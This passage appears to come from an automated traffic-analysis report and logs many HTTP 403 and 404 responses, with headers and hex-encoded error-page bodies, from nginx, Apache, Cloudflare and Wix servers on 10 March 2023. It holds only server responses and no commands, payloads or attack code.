                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7jaPyjwLjpx7mFuLUb16%2Bs1OcRqz45TnLT8x9Thtw5ApsCJwlUk1cjfH5p%2FLc4oZ0kCjQC85guarrRVvz43cKI9z8AmHj3m6JQJfn5iRTmv5wxqyARc2PYW7LPag"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a85f4a71928f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DiFRh4FtQut45CIHKVF3pNySqKjLa2yD4TFJ5Hyr0uf0QON2K0ep0gC2k6Th9g9Czv68kEgYfXy9FXjms01XWw5h33LX8xCDrNv09YF%2FtRc9t99nXQHpnew%2BENq%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8612c588fc5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxFK0%2FZCBuym6U7iRdwjb7DAwxR%2FsK11lRaQ0aecg2zx9S7eR09QZNVpz7mnlEOCYm9i6ayGyTXiWqVljhpvKBzzYQg7LxsgdbxUsnLBb7boFL20m0PkyrK6S1Is"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a86b58eb3719-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:27 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:28 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gi6ilxtKHfH8ohCyGJjM8nu8pYGwIDKo6O4sUi0fS3Lx2MgVi0IJDTYK53Z8tHv6tfFaF6zbVH4QUHNMch0SYroqnrSC7Q%2F2rY8r2Xq7447GF%2FavjUrypJEgDTZS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8795cdcbb61-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ml1YeOB8yr1E5i7CqwEW2PLZgRPwKeqiuGTxvoRt8cz0VSWdV%2FQuTPTv4rxbHkauFy7VGlOsFpl40IKuJZUfS9063aPNB%2FhHPRHurY5LOIGgi9PjkPwF8WsMvFf6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a87afd67bb4f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OClV9AkEWDpcV0m299mLMd8pfjvXREVSt7MZXE8aVX4GfznYuDA%2FipEduZd%2BVRMVLETEyZIgpSd%2F1zFatehFT%2B1BNdDhVElL8opQ1G%2BKoYlMdnJr5EsKQg2AF3ia"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a87b1b5637ca-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:30 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:57 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:58 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:15 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfUULPX/0mKWXsvRp6aPYGx,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1678431255.75082712355615986X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:15 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kmz%2FAJyRiTDccA70igGBC%2F5TccKHvNbu%2FNFRnpyl%2BGSKkyXRBNIkQOoGis8mf%2Br39p69SZPJKP06Fhq8pFAbn8uEvgZ3sjBuxALALHu%2BAra%2FnDk0Sw2kMXzhKvxlrbVl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5369ed15cb0-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7L1vku4mAcnhM4apz83TjO8FsgcRdlwJfAJUabHnstEMiCFgX1PaPJMRHMz73kTyd7y8PXgwpCQXFc3M1%2BV2tENi4owacJIMadaNH%2FhO%2B%2BKncpadeREek2t6ZbaYuLr0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a536ff355cb0-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=reHa0CvkcxhgbH0eiLLEVfRHB%2BTofqOo%2Fg9v%2FFAr%2FTB2LN3S43SiUtwOjijditU%2BlIlIWzCWvItEkata1%2Bw5drFBZzXSorjcWPti66FK5%2FEnOHTSlq%2Flfn6tzVL9vA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a53c7cf35ba4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 Data Ascii: 1c48<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge">
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE 